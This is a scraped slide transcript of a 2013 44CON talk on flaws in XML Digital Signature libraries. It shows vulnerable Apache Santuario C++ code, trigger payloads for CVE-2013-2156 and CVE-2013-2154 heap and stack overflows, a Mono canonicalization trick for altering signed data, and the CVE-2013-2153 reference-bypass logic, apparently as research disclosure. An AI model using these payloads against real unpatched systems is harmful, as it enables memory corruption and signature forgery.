44con 2013 - the forger's art: exploiting xml digital signature implementations - james forshaw
DESCRIPTION
Many security critical systems rely on the correct implementation of the XML Digital Signature standard for the purposes of verification and identity management. Technologies such as SAML and Web Service Security use the standard, and its sibling XML Encryption, to manage the security of these technologies. Being a standard there is, unsurprisingly, no canonical implementation for any platform or language, with so many different developments there are likely to be differences in how the standard is interpreted. This presentation is about research done against the main open and closed source implementations of XML Digital Signatures, how they can be exploited to gain remote code execution, signature verification bypass or denial of service. It will show some of the more nasty vulnerabilities found during the research including a novel attack against the built-in Java and .NET libraries which allow for trivial signature spoofing exposing any user of those implementations into accepting an invalid signature which is independent of their usage.TRANSCRIPT
![Page 1: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/1.jpg)
Research. Response. Assurance. @CTXIS
The Forger’s ArtExploiting XML Digital Signature Implementations
44con 2013
James Forshaw (@tiraniddo)
![Page 2: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/2.jpg)
What am I going to talk
about?
• XML Digital Signature Implementations
• Vulnerabilities and how to exploit
– Memory Corruption
– Denial of Service
– Parsing Issues
– Signature Spoofing
• Demos
![Page 3: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/3.jpg)
Why?
• SOAP Web Service Security
• Visa 3D Secure / Verified by Visa
• SAML Assertions
• MS Office Signatures
• .NET ClickOnce/XBAP Manifests
![Page 4: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/4.jpg)
Once upon a time, on a client site...
![Page 5: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/5.jpg)
Implementations
![Page 6: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/6.jpg)
Existing Attacks
• Been numerous attacks against XML
Digital Signatures
• HMAC Truncation (CVE-2009-0217)
• Signature Wrapping
• XSLT – DoS/Remote Code Execution
![Page 7: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/7.jpg)
What are XML Digital
Signatures?
![Page 8: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/8.jpg)
XML Digital Signatures
![Page 9: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/9.jpg)
Signing XML
XML Document
<good/>
Read Bytes Sign
Signature
![Page 10: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/10.jpg)
Signing XML
XML Document
<good/>
S/MIME? PGP?
Signature
![Page 11: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/11.jpg)
Of Course Not
As the "great" Steve Ballmer might have said:
"XML Developers, XML Developers,
XML Developers!"
![Page 12: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/12.jpg)
Signing XML
Reference
XML Document
<good/>
Transform
Signed XML Document
<good/>
<good/>
SHA1: 09381a09812f20...
Digest
SignedInfo
<SignedInfo><CanonicalizationMethod/><SignatureMethod/><Reference URI="#id">
<Transforms/><DigestMethod/><DigestValue>C2pG...</DigestValue>
</Reference></SignedInfo>
Canonicalize
SHA1: 5282abc5efefa0...
Digest
Sign
Identity
Build Result
![Page 13: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/13.jpg)
<good><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo>
<CanonicalizationMethodAlgorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
<SignatureMethodAlgorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
<Reference URI=""><Transforms>
<TransformAlgorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
</Transforms><DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><DigestValue>C2pG...</DigestValue>
</Reference></SignedInfo><SignatureValue>K4TYp...</SignatureValue>
</Signature></good>
Signed XML Document
![Page 14: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/14.jpg)
<good><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo>
<CanonicalizationMethodAlgorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
<SignatureMethodAlgorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
<Reference URI=""> <Transforms>
<TransformAlgorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
</Transforms> <DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/> <DigestValue>C2pG...</DigestValue>
</Reference> </SignedInfo> <SignatureValue>K4TYp...</SignatureValue>
</Signature></good>
Signed XML Document
![Page 15: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/15.jpg)
<good><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"> <SignedInfo>
<CanonicalizationMethodAlgorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
<SignatureMethodAlgorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
<Reference URI=""> <Transforms>
<TransformAlgorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
</Transforms> <DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/> <DigestValue>C2pG...</DigestValue>
</Reference> </SignedInfo> <SignatureValue>K4TYp...</SignatureValue>
</Signature> </good>
Signed XML Document
![Page 16: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/16.jpg)
<good><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"> <SignedInfo>
<CanonicalizationMethodAlgorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
<SignatureMethodAlgorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
<Reference URI=""><Transforms>
<TransformAlgorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
</Transforms><DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><DigestValue>C2pG...</DigestValue>
</Reference></SignedInfo><SignatureValue>K4TYp...</SignatureValue>
</Signature> </good>
Signed XML Document
![Page 17: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/17.jpg)
<good><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"> <SignedInfo>
<CanonicalizationMethodAlgorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
<SignatureMethodAlgorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
<Reference URI=""><Transforms>
<TransformAlgorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
</Transforms><DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><DigestValue>C2pG...</DigestValue>
</Reference></SignedInfo> <SignatureValue>K4TYp...</SignatureValue>
</Signature> </good>
Signed XML Document
![Page 18: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/18.jpg)
Signature Parsing
SignedInfoVerification
Reference Verification
Verification Pipeline
?
<good/>
<SignedInfo><CanonicalizationMethod/><SignatureMethod/><Reference URI="#id">
<Transforms/><DigestMethod/><DigestValue>C2pG...</DigestValue>
</Reference></SignedInfo>
![Page 19: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/19.jpg)
Signature Parsing Bugs
![Page 20: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/20.jpg)
CVE-2013-2156
• Affected Apache Santuario C++
• Unauthenticated
• Heap overflow in Exclusive
Canonicalization prefix list
![Page 21: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/21.jpg)
Canonicalization Prefix List
<TransformAlgorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList="xsd ds"
xmlns="http://www.w3.org/2001/10/xml-exc-c14n#"/></Transform>
![Page 22: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/22.jpg)
Canonicalization Prefix List
<TransformAlgorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList="xsd ds"
xmlns="http://www.w3.org/2001/10/xml-exc-c14n#"/> </Transform>
![Page 23: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/23.jpg)
CVE-2013-2156bool isWhiteSpace(char c) {
return c == ' ' || c == '\0' || c == '\t'|| c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) { char* nsBuf = new char [strlen(xmlnsList) + 1]; int i = 0, j = 0;
while (xmlnsList[i] != '\0') { while (isWhiteSpace(xmlnsList[i]))
++i; // Skip white space
j = 0; while (!isWhiteSpace(xmlnsList[i]))
nsBuf[j++] = xmlnsList[i++]; // Copy name// Terminate the stringnsBuf[j] = '\0';
// Add to exclusive listm_exclNSList.push_back(strdup(nsBuf));
}}
![Page 24: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/24.jpg)
CVE-2013-2156bool isWhiteSpace(char c) {
return c == ' ' || c == '\0' || c == '\t'|| c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) { char* nsBuf = new char [strlen(xmlnsList) + 1]; int i = 0, j = 0;
while (xmlnsList[i] != '\0') { while (isWhiteSpace(xmlnsList[i]))
++i; // Skip white space
j = 0; while (!isWhiteSpace(xmlnsList[i]))
nsBuf[j++] = xmlnsList[i++]; // Copy name // Terminate the string nsBuf[j] = '\0';
// Add to exclusive list m_exclNSList.push_back(strdup(nsBuf));
}}
![Page 25: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/25.jpg)
CVE-2013-2156bool isWhiteSpace(char c) {
return c == ' ' || c == '\0' || c == '\t'|| c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) { char* nsBuf = new char [strlen(xmlnsList) + 1]; int i = 0, j = 0;
while (xmlnsList[i] != '\0') { while (isWhiteSpace(xmlnsList[i]))
++i; // Skip white space
j = 0; while (!isWhiteSpace(xmlnsList[i]))
nsBuf[j++] = xmlnsList[i++]; // Copy name // Terminate the string nsBuf[j] = '\0';
// Add to exclusive list m_exclNSList.push_back(strdup(nsBuf));
}}
![Page 26: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/26.jpg)
CVE-2013-2156bool isWhiteSpace(char c) {
return c == ' ' || c == '\0' || c == '\t'|| c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) { char* nsBuf = new char [strlen(xmlnsList) + 1]; int i = 0, j = 0;
while (xmlnsList[i] != '\0') { while (isWhiteSpace(xmlnsList[i]))
++i; // Skip white space
j = 0; while (!isWhiteSpace(xmlnsList[i]))
nsBuf[j++] = xmlnsList[i++]; // Copy name // Terminate the string nsBuf[j] = '\0';
// Add to exclusive list m_exclNSList.push_back(strdup(nsBuf));
}}
![Page 27: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/27.jpg)
CVE-2013-2156bool isWhiteSpace(char c) {
return c == ' ' || c == '\0' || c == '\t'|| c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) { char* nsBuf = new char [strlen(xmlnsList) + 1]; int i = 0, j = 0;
while (xmlnsList[i] != '\0') { while (isWhiteSpace(xmlnsList[i]))
++i; // Skip white space
j = 0; while (!isWhiteSpace(xmlnsList[i]))
nsBuf[j++] = xmlnsList[i++]; // Copy name// Terminate the stringnsBuf[j] = '\0';
// Add to exclusive listm_exclNSList.push_back(strdup(nsBuf));
}}
![Page 28: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/28.jpg)
CVE-2013-2156bool isWhiteSpace(char c) {
return c == ' ' || c == '\0' || c == '\t'|| c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) { char* nsBuf = new char [strlen(xmlnsList) + 1]; int i = 0, j = 0;
while (xmlnsList[i] != '\0') { while (isWhiteSpace(xmlnsList[i]))
++i; // Skip white space
j = 0; while (!isWhiteSpace(xmlnsList[i]))
nsBuf[j++] = xmlnsList[i++]; // Copy name // Terminate the string nsBuf[j] = '\0';
// Add to exclusive list m_exclNSList.push_back(strdup(nsBuf));
}}
![Page 29: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/29.jpg)
CVE-2013-2156bool isWhiteSpace(char c) {
return c == ' ' || c == '\0' || c == '\t'|| c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) { char* nsBuf = new char [strlen(xmlnsList) + 1]; int i = 0, j = 0;
while (xmlnsList[i] != '\0') { while (isWhiteSpace(xmlnsList[i]))
++i; // Skip white space
j = 0; while (!isWhiteSpace(xmlnsList[i]))
nsBuf[j++] = xmlnsList[i++]; // Copy name // Terminate the string nsBuf[j] = '\0';
// Add to exclusive list m_exclNSList.push_back(strdup(nsBuf));
}}
![Page 30: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/30.jpg)
Exploiting It
<Reference URI=""><Transforms><Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList="AAAA..."/>
</Transform><Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList=""/>
</Transform></Transforms></Reference>
![Page 31: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/31.jpg)
Exploiting It
<Reference URI=""><Transforms><Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList="AAAA..."/>
</Transform><Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList=""/>
</Transform></Transforms></Reference>
![Page 32: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/32.jpg)
Exploiting It
<Reference URI=""><Transforms><Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList="AAAA..."/>
</Transform><Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList=""/>
</Transform></Transforms></Reference>
![Page 33: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/33.jpg)
First Transform
'A'xmlnsList
nsBuf
'A' 'A' 'A' 'A'
'A' 'A' 'A' 'A' 'A'
'A' 'A' 'A' 'A'
'A' 'A' 'A' 'A'
![Page 34: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/34.jpg)
Second Transform
' 'xmlnsList
nsBuf
0 'A' 'A' 'A'
X X
'A' 'A' 'A' 'A'
i
isWhiteSpace() == true
j
![Page 35: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/35.jpg)
Second Transform
' 'xmlnsList
nsBuf
0 'A' 'A' 'A'
X X
'A' 'A' 'A' 'A'
i
isWhiteSpace() == true
j
![Page 36: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/36.jpg)
Second Transform
' 'xmlnsList
nsBuf
0 'A' 'A' 'A'
'A' X
'A' 'A' 'A' 'A'
i
isWhiteSpace() == false
j
![Page 37: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/37.jpg)
Second Transform
' 'xmlnsList
nsBuf
0 'A' 'A' 'A'
'A' X
'A' 'A' 'A' 'A'
'A' 'A' 'A' 'A' 'A' 'A' 'A'
![Page 38: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/38.jpg)
CVE-2013-2154
• Affected Apache Santuario C++
• Unauthenticated
• Stack overflow parsing a Reference
URI
• Bonus: Fix was wrong, ended up with a heap overflow instead
![Page 39: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/39.jpg)
Reference URIs
Reference Type Example
ID Reference <Reference URI="#xyz">
Entire Document <Reference URI="">
XPointer ID <Reference URI="#xpointer(id('xyz'))">
XPointer Entire Document <Reference URI="#xpointer(/)">
External <Reference URI="http://domain.com/file.xml">
<good id="xyz"></good>
![Page 40: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/40.jpg)
CVE-2013-2154
const char* URI = getReferenceUri();
// Check for #xpointer(id('A'))if (strncmp(URI, "#xpointer(id('", 14) == 0){
size_t len = strlen(&URI[14]); char tmp[512];
if (len > 511) len = 511;
size_t j = 14, i = 0;
// Extract ID valuewhile (URI[j] != '\'') {
tmp[i++] = URI[j++]; } tmp[i] = '\0';
}
![Page 41: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/41.jpg)
CVE-2013-2154
const char* URI = getReferenceUri();
// Check for #xpointer(id('A'))if (strncmp(URI, "#xpointer(id('", 14) == 0){
size_t len = strlen(&URI[14]); char tmp[512];
if (len > 511) len = 511;
size_t j = 14, i = 0;
// Extract ID valuewhile (URI[j] != '\'') {
tmp[i++] = URI[j++]; } tmp[i] = '\0';
}
![Page 42: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/42.jpg)
CVE-2013-2154
const char* URI = getReferenceUri();
// Check for #xpointer(id('A')) if (strncmp(URI, "#xpointer(id('", 14) == 0){
size_t len = strlen(&URI[14]); char tmp[512];
if (len > 511) len = 511;
size_t j = 14, i = 0;
// Extract ID valuewhile (URI[j] != '\'') {
tmp[i++] = URI[j++]; } tmp[i] = '\0';
}
![Page 43: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/43.jpg)
CVE-2013-2154
const char* URI = getReferenceUri();
// Check for #xpointer(id('A')) if (strncmp(URI, "#xpointer(id('", 14) == 0){
size_t len = strlen(&URI[14]); char tmp[512];
if (len > 511) len = 511;
size_t j = 14, i = 0;
// Extract ID valuewhile (URI[j] != '\'') {
tmp[i++] = URI[j++]; } tmp[i] = '\0';
}
![Page 44: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/44.jpg)
Exploiting It
<root> <Signature xmlns="http://www.w3.org/2000/09/xmldsig#"> <SignedInfo> <CanonicalizationMethod/> <SignatureMethod/> <Reference URI="#xpointer(id('AAAA...')"><Transforms/><DigestMethod/><DigestValue>C2pG...</DigestValue>
</Reference></SignedInfo> <SignatureValue>B9OL....</SignatureValue>
</Signature> </root>
![Page 45: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/45.jpg)
Reference Verification Bugs
![Page 46: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/46.jpg)
XML Equivalence
• Different physical XML representations
might still be equivalent
<good x="1" y="2"/>
<good y="2" x="1"></good>
≡
![Page 47: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/47.jpg)
Naïve Verification
SHA1 SHA1
≡
1cc730a1b7826... 3826723a6d5ff15...≠
<good x="1" y="2"/> <good y="2" x="1"></good>
![Page 48: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/48.jpg)
≡
Canonicalization (C14N)
SHA1
9c251a80204943...
<good x="1" y="2"/> <good y="2" x="1"></good>
Canonicalizer
<good x="1" y="2"></good>
![Page 49: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/49.jpg)
Canonicalization (C14N)
XML Document 1 XML Document 2
SHA1
XXXXXXXXXXXXXX...
Canonical XML
Canonicalizer
≢
![Page 50: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/50.jpg)
Mono C14N Vulnerability
• Affected Mono (unfixed)
• Also affected XMLSEC1 (fixed)
• Allows limited signed content
modification
• Same author for both implementations
![Page 51: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/51.jpg)
W3C Canonical XML
![Page 52: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/52.jpg)
The Bug
<good x='"'/> <good x="""></good>
<good xmlns='"'/> <good xmlns="""></good>
LibXML2 Requires Valid URLs for Namespaces, though Mono doesn't
Still, xmlns='http://["]/' works on XMLSEC1
![Page 53: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/53.jpg)
Exploiting It
<Transaction><x:Expiry xmlns:x='http://app/timestamp' time='10:00:00'/><Payee>Bob</Payee><Amount>$100</Amount>
</Transaction>
bool IsExpired(XmlNode trans) {XmlNode expiry = trans.GetElementByName("http://app/timestamp", "Expiry");if(expiry != null) {
return CheckExpiry(expiry); } return false;
}
![Page 54: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/54.jpg)
Exploiting It
<Transaction><x:Expiry xmlns:x='http://app/timestamp" time="10:00:00'/><Payee>Bob</Payee><Amount>$100</Amount>
</Transaction>
<Transaction><x:Expiry xmlns:x="http://app/timestamp" time="10:00:00"/><Payee>Bob</Payee><Amount>$100</Amount>
</Transaction>
NS Before = 'http://app/timestamp" time="10:00:00'NS After = 'http://app/timestamp'
![Page 55: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/55.jpg)
CVE-2013-2153
• Affected Apache Santuario C++
• Signature Bypass by Hiding References
• Uses an Interesting parsing exploit
• Almost works in Mono, but they got
Lucky!
![Page 56: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/56.jpg)
CVE-2013-2153
bool DSIGSignature::verify(void) {
// First thing to do is check the referencesbool referenceCheckResult = mp_signedInfo->verify();
// Check the signaturebool sigVfyResult = verifySignatureOnlyInternal();
return sigVfyResult & referenceCheckResult; }
![Page 57: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/57.jpg)
CVE-2013-2153
bool DSIGSignature::verify(void) {
// First thing to do is check the references bool referenceCheckResult = mp_signedInfo->verify();
// Check the signature bool sigVfyResult = verifySignatureOnlyInternal();
return sigVfyResult & referenceCheckResult; }
// ------------------------------------------// Verify each reference element// ------------------------------------------
bool DSIGSignedInfo::verify() { return DSIGReference::verifyReferenceList(mp_referenceList);
}
![Page 58: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/58.jpg)
CVE-2013-2153
bool DSIGSignature::verify(void) {
// First thing to do is check the referencesbool referenceCheckResult = mp_signedInfo->verify();
// Check the signaturebool sigVfyResult = verifySignatureOnlyInternal();
return sigVfyResult & referenceCheckResult; }
// ------------------------------------------// Verify each reference element// ------------------------------------------
bool DSIGSignedInfo::verify() { return DSIGReference::verifyReferenceList(mp_referenceList);
}
bool DSIGReference::verifyReferenceList(DSIGReferenceList * lst) { // Run through a list of hashes and checkHash for each onebool res = true; int size = lst->getSize(); for (int i = 0; i < size; ++i) {
if (lst->item(i)->checkHash()) { res = false;
} }
return res; }
![Page 59: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/59.jpg)
CVE-2013-2153
bool DSIGSignature::verify(void) {
// First thing to do is check the references bool referenceCheckResult = mp_signedInfo->verify();
// Check the signature bool sigVfyResult = verifySignatureOnlyInternal();
return sigVfyResult & referenceCheckResult; }
// ------------------------------------------// Verify each reference element // ------------------------------------------
bool DSIGSignedInfo::verify() { return DSIGReference::verifyReferenceList(mp_referenceList);
}
bool DSIGReference::verifyReferenceList(DSIGReferenceList * lst) { // Run through a list of hashes and checkHash for each one bool res = true; int size = lst->getSize(); for (int i = 0; i < size; ++i) {
if (lst->item(i)->checkHash()) { res = false;
} }
return res; }
